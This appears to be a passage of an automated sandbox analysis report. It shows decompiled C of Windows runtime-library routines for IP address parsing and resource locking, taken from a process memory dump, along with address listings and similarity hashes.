                                                                                                                                                    					if(_t180 != 0) {
                                                                                                                                                    						if(_v12 > 3) {
                                                                                                                                                    							goto L6;
                                                                                                                                                    						}
                                                                                                                                                    						_t120 = E02060CFA(_v28, 0, 0xa);
                                                                                                                                                    						_t183 = _t183 + 0xc;
                                                                                                                                                    						if(_t120 > 0xff) {
                                                                                                                                                    							goto L6;
                                                                                                                                                    						}
                                                                                                                                                    						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                    						goto L47;
                                                                                                                                                    					}
                                                                                                                                                    					if(_v12 > 4) {
                                                                                                                                                    						goto L6;
                                                                                                                                                    					}
                                                                                                                                                    					_t121 = E02060CFA(_v28, _t180, 0x10);
                                                                                                                                                    					_t183 = _t183 + 0xc;
                                                                                                                                                    					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                    					goto L47;
                                                                                                                                                    				} else {
                                                                                                                                                    					while(1) {
                                                                                                                                                    						_t123 = _v16;
                                                                                                                                                    						if(_t123 == 0) {
                                                                                                                                                    							goto L7;
                                                                                                                                                    						}
                                                                                                                                                    						_t108 = _t123 - 1;
                                                                                                                                                    						if(_t108 != 0) {
                                                                                                                                                    							goto L1;
                                                                                                                                                    						}
                                                                                                                                                    						_t178 = _t141;
                                                                                                                                                    						if(E020606BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                    							if(E020606BA(_t135, _t178) == 0 || E02060A5B(_t136, _t178) == 0) {
                                                                                                                                                    								if(_t141 != 0x3a) {
                                                                                                                                                    									if(_t141 == 0x2e) {
                                                                                                                                                    										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                    											goto L41;
                                                                                                                                                    										} else {
                                                                                                                                                    											_v24 = _v24 + 1;
                                                                                                                                                    											L27:
                                                                                                                                                    											_v16 = _v16 & 0x00000000;
                                                                                                                                                    											L28:
                                                                                                                                                    											if(_v28 == 0) {
                                                                                                                                                    												goto L20;
                                                                                                                                                    											}
                                                                                                                                                    											_t177 = _v24;
                                                                                                                                                    											if(_t177 != 0) {
                                                                                                                                                    												if(_v12 > 3) {
                                                                                                                                                    													L6:
                                                                                                                                                    													return 0xc000000d;
                                                                                                                                                    												}
                                                                                                                                                    												_t132 = E02060CFA(_v28, 0, 0xa);
                                                                                                                                                    												_t183 = _t183 + 0xc;
                                                                                                                                                    												if(_t132 > 0xff) {
                                                                                                                                                    													goto L6;
                                                                                                                                                    												}
                                                                                                                                                    												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                    												goto L20;
                                                                                                                                                    											}
                                                                                                                                                    											if(_v12 > 4) {
                                                                                                                                                    												goto L6;
                                                                                                                                                    											}
                                                                                                                                                    											_t133 = E02060CFA(_v28, 0, 0x10);
                                                                                                                                                    											_t183 = _t183 + 0xc;
                                                                                                                                                    											_v20 = _v20 + 1;
                                                                                                                                                    											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                    											goto L20;
                                                                                                                                                    										}
                                                                                                                                                    									}
                                                                                                                                                    									goto L41;
                                                                                                                                                    								}
                                                                                                                                                    								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                    									goto L41;
                                                                                                                                                    								} else {
                                                                                                                                                    									_t130 = _t179 + 1;
                                                                                                                                                    									if( *_t130 == _t141) {
                                                                                                                                                    										if(_v32 != 0) {
                                                                                                                                                    											goto L41;
                                                                                                                                                    										}
                                                                                                                                                    										_v32 = _v8 + 1;
                                                                                                                                                    										_t156 = 2;
                                                                                                                                                    										_v8 = _v8 + _t156;
                                                                                                                                                    										L34:
                                                                                                                                                    										_t179 = _t130;
                                                                                                                                                    										_v16 = _t156;
                                                                                                                                                    										goto L28;
                                                                                                                                                    									}
                                                                                                                                                    									_v8 = _v8 + 1;
                                                                                                                                                    									goto L27;
                                                                                                                                                    								}
                                                                                                                                                    							} else {
                                                                                                                                                    								_v12 = _v12 + 1;
                                                                                                                                                    								if(_v24 > 0) {
                                                                                                                                                    									goto L41;
                                                                                                                                                    								}
                                                                                                                                                    								_a7 = 1;
                                                                                                                                                    								goto L20;
                                                                                                                                                    							}
                                                                                                                                                    						} else {
                                                                                                                                                    							_v12 = _v12 + 1;
                                                                                                                                                    							L20:
                                                                                                                                                    							_t179 = _t179 + 1;
                                                                                                                                                    							_t141 =  *_t179;
                                                                                                                                                    							if(_t141 == 0) {
                                                                                                                                                    								goto L41;
                                                                                                                                                    							}
                                                                                                                                                    							continue;
                                                                                                                                                    						}
                                                                                                                                                    						L7:
                                                                                                                                                    						if(_t141 == 0x3a) {
                                                                                                                                                    							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                    								goto L41;
                                                                                                                                                    							} else {
                                                                                                                                                    								_t130 = _t179 + 1;
                                                                                                                                                    								if( *_t130 != _t141) {
                                                                                                                                                    									goto L41;
                                                                                                                                                    								}
                                                                                                                                                    								_v20 = _v20 + 1;
                                                                                                                                                    								_t156 = 2;
                                                                                                                                                    								_v32 = 1;
                                                                                                                                                    								_v8 = _t156;
                                                                                                                                                    								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                    								goto L34;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						L8:
                                                                                                                                                    						if(_v8 > 7) {
                                                                                                                                                    							goto L41;
                                                                                                                                                    						}
                                                                                                                                                    						_t142 = _t141;
                                                                                                                                                    						if(E020606BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                    							if(E020606BA(_t124, _t142) == 0 || E02060A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                    								goto L41;
                                                                                                                                                    							} else {
                                                                                                                                                    								_t128 = 1;
                                                                                                                                                    								_a7 = 1;
                                                                                                                                                    								_v28 = _t179;
                                                                                                                                                    								_v16 = 1;
                                                                                                                                                    								_v12 = 1;
                                                                                                                                                    								L39:
                                                                                                                                                    								if(_v16 == _t128) {
                                                                                                                                                    									goto L20;
                                                                                                                                                    								}
                                                                                                                                                    								goto L28;
                                                                                                                                                    							}
                                                                                                                                                    						} else {
                                                                                                                                                    							_a7 = 0;
                                                                                                                                                    							_v28 = _t179;
                                                                                                                                                    							_v16 = 1;
                                                                                                                                                    							_v12 = 1;
                                                                                                                                                    							goto L20;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				L1:
                                                                                                                                                    				_t123 = _t108 == 1;
                                                                                                                                                    				if(_t108 == 1) {
                                                                                                                                                    					goto L8;
                                                                                                                                                    				}
                                                                                                                                                    				_t128 = 1;
                                                                                                                                                    				goto L39;
                                                                                                                                                    			}

























                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060b44
                                                                                                                                                    0x02060b47
                                                                                                                                                    0x02060b49
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060b4f
                                                                                                                                                    0x02060b50
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060b56
                                                                                                                                                    0x02060b62
                                                                                                                                                    0x02060b7c
                                                                                                                                                    0x02060bac
                                                                                                                                                    0x02060a0f
                                                                                                                                                    0x0208eaaa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eac4
                                                                                                                                                    0x0208eac4
                                                                                                                                                    0x02060bd0
                                                                                                                                                    0x02060bd0
                                                                                                                                                    0x02060bd4
                                                                                                                                                    0x02060bd9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060bdb
                                                                                                                                                    0x02060be0
                                                                                                                                                    0x0208eb0e
                                                                                                                                                    0x02060a1a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060a1a
                                                                                                                                                    0x0208eb1a
                                                                                                                                                    0x0208eb1f
                                                                                                                                                    0x0208eb27
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eb36
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eb36
                                                                                                                                                    0x02060bea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060bf6
                                                                                                                                                    0x02060c00
                                                                                                                                                    0x02060c03
                                                                                                                                                    0x02060c0b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060c0b
                                                                                                                                                    0x0208eaaa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060a15
                                                                                                                                                    0x02060bb6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060bc6
                                                                                                                                                    0x02060bc6
                                                                                                                                                    0x02060bcb
                                                                                                                                                    0x02060c15
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060c1d
                                                                                                                                                    0x02060c20
                                                                                                                                                    0x02060c21
                                                                                                                                                    0x02060c24
                                                                                                                                                    0x02060c24
                                                                                                                                                    0x02060c26
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060c26
                                                                                                                                                    0x02060bcd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060bcd
                                                                                                                                                    0x02060b89
                                                                                                                                                    0x02060b89
                                                                                                                                                    0x02060b90
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060b96
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060b96
                                                                                                                                                    0x02060a04
                                                                                                                                                    0x02060a04
                                                                                                                                                    0x02060b9a
                                                                                                                                                    0x02060b9a
                                                                                                                                                    0x02060b9b
                                                                                                                                                    0x02060b9f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060ba5
                                                                                                                                                    0x02060ac7
                                                                                                                                                    0x02060aca
                                                                                                                                                    0x0208eacf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eade
                                                                                                                                                    0x0208eade
                                                                                                                                                    0x0208eae3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eaf3
                                                                                                                                                    0x0208eaf6
                                                                                                                                                    0x0208eaf7
                                                                                                                                                    0x0208eafe
                                                                                                                                                    0x0208eb01
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eb01
                                                                                                                                                    0x0208eacf
                                                                                                                                                    0x02060ad0
                                                                                                                                                    0x02060ad4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060ada
                                                                                                                                                    0x02060ae6
                                                                                                                                                    0x02060c34
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060c47
                                                                                                                                                    0x02060c49
                                                                                                                                                    0x02060c4a
                                                                                                                                                    0x02060c4e
                                                                                                                                                    0x02060c51
                                                                                                                                                    0x02060c54
                                                                                                                                                    0x02060c57
                                                                                                                                                    0x02060c5a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060c60
                                                                                                                                                    0x02060afb
                                                                                                                                                    0x02060afe
                                                                                                                                                    0x02060b02
                                                                                                                                                    0x02060b05
                                                                                                                                                    0x02060b08
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060b08
                                                                                                                                                    0x02060ae6
                                                                                                                                                    0x02060b44
                                                                                                                                                    0x020609f8
                                                                                                                                                    0x020609f8
                                                                                                                                                    0x020609f9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eaa0
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fassign
                                                                                                                                                    • String ID: .$:$:
                                                                                                                                                    • API String ID: 3965848254-2308638275
                                                                                                                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                    • Instruction ID: 1c8e0551da3dacb68559ca800a60273664f51ba42bc36cafc971b400e1b3e4dd
                                                                                                                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                    • Instruction Fuzzy Hash: EAA1AD71D8030AEECF25DF64C8487BEBBB7BF05318F24846AD842A7281D7319649EB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                    			E02060554(signed int _a4, char _a8) {
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				signed int* _t49;
                                                                                                                                                    				signed int _t51;
                                                                                                                                                    				signed int _t56;
                                                                                                                                                    				signed int _t58;
                                                                                                                                                    				signed int _t61;
                                                                                                                                                    				signed int _t63;
                                                                                                                                                    				void* _t66;
                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                    				void* _t69;
                                                                                                                                                    				signed int _t70;
                                                                                                                                                    				void* _t75;
                                                                                                                                                    				signed int _t81;
                                                                                                                                                    				signed int _t84;
                                                                                                                                                    				void* _t86;
                                                                                                                                                    				signed int _t93;
                                                                                                                                                    				signed int _t96;
                                                                                                                                                    				intOrPtr _t105;
                                                                                                                                                    				signed int _t107;
                                                                                                                                                    				void* _t110;
                                                                                                                                                    				signed int _t115;
                                                                                                                                                    				signed int* _t119;
                                                                                                                                                    				void* _t125;
                                                                                                                                                    				void* _t126;
                                                                                                                                                    				signed int _t128;
                                                                                                                                                    				signed int _t130;
                                                                                                                                                    				signed int _t138;
                                                                                                                                                    				signed int _t144;
                                                                                                                                                    				void* _t158;
                                                                                                                                                    				void* _t159;
                                                                                                                                                    				void* _t160;
                                                                                                                                                    
                                                                                                                                                    				_t96 = _a4;
                                                                                                                                                    				_t115 =  *(_t96 + 0x28);
                                                                                                                                                    				_push(_t138);
                                                                                                                                                    				if(_t115 < 0) {
                                                                                                                                                    					_t105 =  *[fs:0x18];
                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                    					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                    						goto L6;
                                                                                                                                                    					} else {
                                                                                                                                                    						__eflags = _t115 | 0xffffffff;
                                                                                                                                                    						asm("lock xadd [eax], edx");
                                                                                                                                                    						return 1;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					L6:
                                                                                                                                                    					_push(_t128);
                                                                                                                                                    					while(1) {
                                                                                                                                                    						L7:
                                                                                                                                                    						__eflags = _t115;
                                                                                                                                                    						if(_t115 >= 0) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						__eflags = _a8;
                                                                                                                                                    						if(_a8 == 0) {
                                                                                                                                                    							__eflags = 0;
                                                                                                                                                    							return 0;
                                                                                                                                                    						} else {
                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                    							_t49 = _t96 + 0x1c;
                                                                                                                                                    							_t106 = 1;
                                                                                                                                                    							asm("lock xadd [edx], ecx");
                                                                                                                                                    							_t115 =  *(_t96 + 0x28);
                                                                                                                                                    							__eflags = _t115;
                                                                                                                                                    							if(_t115 < 0) {
                                                                                                                                                    								L23:
                                                                                                                                                    								_t130 = 0;
                                                                                                                                                    								__eflags = 0;
                                                                                                                                                    								while(1) {
                                                                                                                                                    									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                    									asm("sbb esi, esi");
                                                                                                                                                    									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x021001c0;
                                                                                                                                                    									_push(_t144);
                                                                                                                                                    									_push(0);
                                                                                                                                                    									_t51 = E0201F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                    									__eflags = _t51 - 0x102;
                                                                                                                                                    									if(_t51 != 0x102) {
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									_t106 =  *(_t144 + 4);
                                                                                                                                                    									_t126 =  *_t144;
                                                                                                                                                    									_t86 = E02064FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                    									_push(_t126);
                                                                                                                                                    									_push(_t86);
                                                                                                                                                    									E02073F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                    									E02073F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                    									_t130 = _t130 + 1;
                                                                                                                                                    									_t160 = _t158 + 0x28;
                                                                                                                                                    									__eflags = _t130 - 2;
                                                                                                                                                    									if(__eflags > 0) {
                                                                                                                                                    										E020A217A(_t106, __eflags, _t96);
                                                                                                                                                    									}
                                                                                                                                                    									_push("RTL: Re-Waiting\n");
                                                                                                                                                    									_push(0);
                                                                                                                                                    									_push(0x65);
                                                                                                                                                    									E02073F92();
                                                                                                                                                    									_t158 = _t160 + 0xc;
                                                                                                                                                    								}
                                                                                                                                                    								__eflags = _t51;
                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                    									_push(_t51);
                                                                                                                                                    									E02063915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                    									asm("int3");
                                                                                                                                                    									while(1) {
                                                                                                                                                    										L32:
                                                                                                                                                    										__eflags = _a8;
                                                                                                                                                    										if(_a8 == 0) {
                                                                                                                                                    											break;
                                                                                                                                                    										}
                                                                                                                                                    										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                    										_t119 = _t96 + 0x24;
                                                                                                                                                    										_t107 = 1;
                                                                                                                                                    										asm("lock xadd [eax], ecx");
                                                                                                                                                    										_t56 =  *(_t96 + 0x28);
                                                                                                                                                    										_a4 = _t56;
                                                                                                                                                    										__eflags = _t56;
                                                                                                                                                    										if(_t56 != 0) {
                                                                                                                                                    											L40:
                                                                                                                                                    											_t128 = 0;
                                                                                                                                                    											__eflags = 0;
                                                                                                                                                    											while(1) {
                                                                                                                                                    												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                    												asm("sbb esi, esi");
                                                                                                                                                    												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x021001c0;
                                                                                                                                                    												_push(_t138);
                                                                                                                                                    												_push(0);
                                                                                                                                                    												_t58 = E0201F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                    												__eflags = _t58 - 0x102;
                                                                                                                                                    												if(_t58 != 0x102) {
                                                                                                                                                    													break;
                                                                                                                                                    												}
                                                                                                                                                    												_t107 =  *(_t138 + 4);
                                                                                                                                                    												_t125 =  *_t138;
                                                                                                                                                    												_t75 = E02064FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                    												_push(_t125);
                                                                                                                                                    												_push(_t75);
                                                                                                                                                    												E02073F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                    												E02073F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                    												_t128 = _t128 + 1;
                                                                                                                                                    												_t159 = _t158 + 0x28;
                                                                                                                                                    												__eflags = _t128 - 2;
                                                                                                                                                    												if(__eflags > 0) {
                                                                                                                                                    													E020A217A(_t107, __eflags, _t96);
                                                                                                                                                    												}
                                                                                                                                                    												_push("RTL: Re-Waiting\n");
                                                                                                                                                    												_push(0);
                                                                                                                                                    												_push(0x65);
                                                                                                                                                    												E02073F92();
                                                                                                                                                    												_t158 = _t159 + 0xc;
                                                                                                                                                    											}
                                                                                                                                                    											__eflags = _t58;
                                                                                                                                                    											if(__eflags < 0) {
                                                                                                                                                    												_push(_t58);
                                                                                                                                                    												E02063915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                    												asm("int3");
                                                                                                                                                    												_t61 =  *_t107;
                                                                                                                                                    												 *_t107 = 0;
                                                                                                                                                    												__eflags = _t61;
                                                                                                                                                    												if(_t61 == 0) {
                                                                                                                                                    													L1:
                                                                                                                                                    													_t63 = E02045384(_t138 + 0x24);
                                                                                                                                                    													if(_t63 != 0) {
                                                                                                                                                    														goto L52;
                                                                                                                                                    													} else {
                                                                                                                                                    														goto L2;
                                                                                                                                                    													}
                                                                                                                                                    												} else {
                                                                                                                                                    													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                    													_push( &_a4);
                                                                                                                                                    													_push(_t61);
                                                                                                                                                    													_t70 = E0201F970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                    													__eflags = _t70;
                                                                                                                                                    													if(__eflags >= 0) {
                                                                                                                                                    														goto L1;
                                                                                                                                                    													} else {
                                                                                                                                                    														_push(_t70);
                                                                                                                                                    														E02063915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                    														L52:
                                                                                                                                                    														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                    														_push( &_a4);
                                                                                                                                                    														_push(1);
                                                                                                                                                    														_t63 = E0201F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                    														__eflags = _t63;
                                                                                                                                                    														if(__eflags >= 0) {
                                                                                                                                                    															L2:
                                                                                                                                                    															return _t63;
                                                                                                                                                    														} else {
                                                                                                                                                    															_push(_t63);
                                                                                                                                                    															E02063915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                    															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                    															_push( &_a4);
                                                                                                                                                    															_push(1);
                                                                                                                                                    															_t63 = E0201F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                    															__eflags = _t63;
                                                                                                                                                    															if(__eflags >= 0) {
                                                                                                                                                    																goto L2;
                                                                                                                                                    															} else {
                                                                                                                                                    																_push(_t63);
                                                                                                                                                    																_t66 = E02063915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                    																asm("int3");
                                                                                                                                                    																while(1) {
                                                                                                                                                    																	_t110 = _t66;
                                                                                                                                                    																	__eflags = _t66 - 1;
                                                                                                                                                    																	if(_t66 != 1) {
                                                                                                                                                    																		break;
                                                                                                                                                    																	}
                                                                                                                                                    																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                    																	_t66 = _t110;
                                                                                                                                                    																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                    																	__eflags = _t66 - _t110;
                                                                                                                                                    																	if(_t66 != _t110) {
                                                                                                                                                    																		continue;
                                                                                                                                                    																	} else {
                                                                                                                                                    																		_t67 =  *[fs:0x18];
                                                                                                                                                    																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                    																		return _t67;
                                                                                                                                                    																	}
                                                                                                                                                    																	goto L59;
                                                                                                                                                    																}
                                                                                                                                                    																E02045329(_t110, _t138);
                                                                                                                                                    																_t69 = E020453A5(_t138, 1);
                                                                                                                                                    																return _t69;
                                                                                                                                                    															}
                                                                                                                                                    														}
                                                                                                                                                    													}
                                                                                                                                                    												}
                                                                                                                                                    											} else {
                                                                                                                                                    												_t56 =  *(_t96 + 0x28);
                                                                                                                                                    												goto L3;
                                                                                                                                                    											}
                                                                                                                                                    										} else {
                                                                                                                                                    											_t107 =  *_t119;
                                                                                                                                                    											__eflags = _t107;
                                                                                                                                                    											if(__eflags > 0) {
                                                                                                                                                    												while(1) {
                                                                                                                                                    													_t81 = _t107;
                                                                                                                                                    													asm("lock cmpxchg [edi], esi");
                                                                                                                                                    													__eflags = _t81 - _t107;
                                                                                                                                                    													if(_t81 == _t107) {
                                                                                                                                                    														break;
                                                                                                                                                    													}
                                                                                                                                                    													_t107 = _t81;
                                                                                                                                                    													__eflags = _t81;
                                                                                                                                                    													if(_t81 > 0) {
                                                                                                                                                    														continue;
                                                                                                                                                    													}
                                                                                                                                                    													break;
                                                                                                                                                    												}
                                                                                                                                                    												_t56 = _a4;
                                                                                                                                                    												__eflags = _t107;
                                                                                                                                                    											}
                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                    												while(1) {
                                                                                                                                                    													L3:
                                                                                                                                                    													__eflags = _t56;
                                                                                                                                                    													if(_t56 != 0) {
                                                                                                                                                    														goto L32;
                                                                                                                                                    													}
                                                                                                                                                    													_t107 = _t107 | 0xffffffff;
                                                                                                                                                    													_t56 = 0;
                                                                                                                                                    													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                    													__eflags = 0;
                                                                                                                                                    													if(0 != 0) {
                                                                                                                                                    														continue;
                                                                                                                                                    													} else {
                                                                                                                                                    														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                    														return 1;
                                                                                                                                                    													}
                                                                                                                                                    													goto L59;
                                                                                                                                                    												}
                                                                                                                                                    												continue;
                                                                                                                                                    											} else {
                                                                                                                                                    												goto L40;
                                                                                                                                                    											}
                                                                                                                                                    										}
                                                                                                                                                    										goto L59;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags = 0;
                                                                                                                                                    									return 0;
                                                                                                                                                    								} else {
                                                                                                                                                    									_t115 =  *(_t96 + 0x28);
                                                                                                                                                    									continue;
                                                                                                                                                    								}
                                                                                                                                                    							} else {
                                                                                                                                                    								_t106 =  *_t49;
                                                                                                                                                    								__eflags = _t106;
                                                                                                                                                    								if(__eflags > 0) {
                                                                                                                                                    									while(1) {
                                                                                                                                                    										_t93 = _t106;
                                                                                                                                                    										asm("lock cmpxchg [edi], esi");
                                                                                                                                                    										__eflags = _t93 - _t106;
                                                                                                                                                    										if(_t93 == _t106) {
                                                                                                                                                    											break;
                                                                                                                                                    										}
                                                                                                                                                    										_t106 = _t93;
                                                                                                                                                    										__eflags = _t93;
                                                                                                                                                    										if(_t93 > 0) {
                                                                                                                                                    											continue;
                                                                                                                                                    										}
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags = _t106;
                                                                                                                                                    								}
                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                    									continue;
                                                                                                                                                    								} else {
                                                                                                                                                    									goto L23;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						goto L59;
                                                                                                                                                    					}
                                                                                                                                                    					_t84 = _t115;
                                                                                                                                                    					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                    					__eflags = _t84 - _t115;
                                                                                                                                                    					if(_t84 != _t115) {
                                                                                                                                                    						_t115 = _t84;
                                                                                                                                                    						goto L7;
                                                                                                                                                    					} else {
                                                                                                                                                    						return 1;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				L59:
                                                                                                                                                    			}




































                                                                                                                                                    0x02082269
                                                                                                                                                    0x02082269
                                                                                                                                                    0x0208226d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02082276
                                                                                                                                                    0x02082279
                                                                                                                                                    0x0208227e
                                                                                                                                                    0x02082283
                                                                                                                                                    0x02082287
                                                                                                                                                    0x0208228a
                                                                                                                                                    0x0208228d
                                                                                                                                                    0x0208228f
                                                                                                                                                    0x020822bc
                                                                                                                                                    0x020822bc
                                                                                                                                                    0x020822bc
                                                                                                                                                    0x020822be
                                                                                                                                                    0x020822c4
                                                                                                                                                    0x020822cc
                                                                                                                                                    0x020822d0
                                                                                                                                                    0x020822d6
                                                                                                                                                    0x020822d7
                                                                                                                                                    0x020822da
                                                                                                                                                    0x020822df
                                                                                                                                                    0x020822e4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020822e6
                                                                                                                                                    0x020822e9
                                                                                                                                                    0x020822f4
                                                                                                                                                    0x020822f9
                                                                                                                                                    0x020822fa
                                                                                                                                                    0x02082305
                                                                                                                                                    0x02082314
                                                                                                                                                    0x02082319
                                                                                                                                                    0x0208231a
                                                                                                                                                    0x0208231d
                                                                                                                                                    0x02082320
                                                                                                                                                    0x02082323
                                                                                                                                                    0x02082323
                                                                                                                                                    0x02082328
                                                                                                                                                    0x0208232d
                                                                                                                                                    0x0208232f
                                                                                                                                                    0x02082331
                                                                                                                                                    0x02082336
                                                                                                                                                    0x02082336
                                                                                                                                                    0x0208233b
                                                                                                                                                    0x0208233d
                                                                                                                                                    0x02082350
                                                                                                                                                    0x02082351
                                                                                                                                                    0x02082356
                                                                                                                                                    0x02082359
                                                                                                                                                    0x02082359
                                                                                                                                                    0x0208235b
                                                                                                                                                    0x0208235d
                                                                                                                                                    0x02045367
                                                                                                                                                    0x0204536b
                                                                                                                                                    0x02045372
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02082363
